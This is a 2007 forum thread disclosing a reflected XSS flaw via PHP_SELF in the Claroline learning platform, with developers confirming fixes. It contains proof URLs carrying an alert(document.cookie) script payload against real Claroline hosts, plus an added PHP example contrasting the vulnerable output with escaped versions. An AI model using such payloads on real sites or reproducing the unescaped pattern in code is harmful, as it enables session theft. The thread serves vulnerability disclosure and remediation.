
index.php XSS [FIXED]

Posted: Sun Mar 11, 2007 8:10 am
by munozferna
$_SERVER['PHP_SELF'] / $PHP_SELF Injection

http://campus.claroline.com/index.php/%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.claroline.net/demo/claroline170/index.php/%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E


You can get more info:
http://blog.phpdoc.info/archives/13-XSS-Woes.html
http://php.net/reserved.variables
http://forum.hardened-php.net/viewtopic.php?id=20

There are several other files vulnerable to this issue.
[fms@core claroline183]$ grep PHP_SELF *.php | wc -l
2
[fms@core claroline183]$ grep PHP_SELF */*.php | wc -l
0
[fms@core claroline183]$ grep PHP_SELF */*/*.php | wc -l
462
[fms@core claroline183]$ grep PHP_SELF */*/*/*.php | wc -l
134
[fms@core claroline183]$ grep PHP_SELF */*/*/*/*.php | wc -l
5
[fms@core claroline183]$ grep PHP_SELF */*/*/*/*/*.php | wc -l
15
[fms@core claroline183]$ grep PHP_SELF */*/*/*/*/*/*.php | wc -l
0
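
Added example, not part of the original post and not Claroline's code: the vulnerable output pattern behind the URLs reported above, beside two hardened forms. The function names and the `$server` array are hypothetical, and the request values are constructed to match the reported URL shape.

```php
<?php
// Added illustration, not Claroline code. PHP_SELF is SCRIPT_NAME followed by
// any extra path the client appended, so the part after "index.php" is
// attacker-controlled input.

// Constructed request state: what PHP sees for the URL shape in the report.
$server = [
    'SCRIPT_NAME' => '/index.php',
    'PHP_SELF'    => '/index.php/"><script>alert(document.cookie)</script>',
];

// Vulnerable pattern: raw PHP_SELF written into an HTML attribute.
function form_raw(array $server): string
{
    return '<form method="post" action="' . $server['PHP_SELF'] . '">';
}

// Fix 1: escape for the HTML attribute context before output.
function form_escaped(array $server): string
{
    $self = htmlspecialchars($server['PHP_SELF'], ENT_QUOTES, 'UTF-8');
    return '<form method="post" action="' . $self . '">';
}

// Fix 2: use SCRIPT_NAME, which excludes the appended path, and still escape.
function form_script_name(array $server): string
{
    $self = htmlspecialchars($server['SCRIPT_NAME'], ENT_QUOTES, 'UTF-8');
    return '<form method="post" action="' . $self . '">';
}

// True when the payload's markup survives into the page as live HTML.
function injects_markup(string $html): bool
{
    return strpos($html, '<script') !== false;
}

foreach (['form_raw', 'form_escaped', 'form_script_name'] as $fn) {
    $html = $fn($server);
    printf("%-17s injects=%s\n  %s\n", $fn, injects_markup($html) ? 'yes' : 'no', $html);
}
```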

Posted: Mon Mar 12, 2007 10:06 am
by mathieu
Thanks.

Solved in 1.9; we'll release a new version of 1.8 fixing this XSS.

http://cvs.claroline.net/cgi-bin/viewcv ... 8&r2=1.269
http://cvs.claroline.net/cgi-bin/viewcv ... 93&r2=1.94

Regards

Mathieu

Posted: Fri Jul 06, 2007 11:17 am
by zefredz
Solved in Claroline 1.8.4+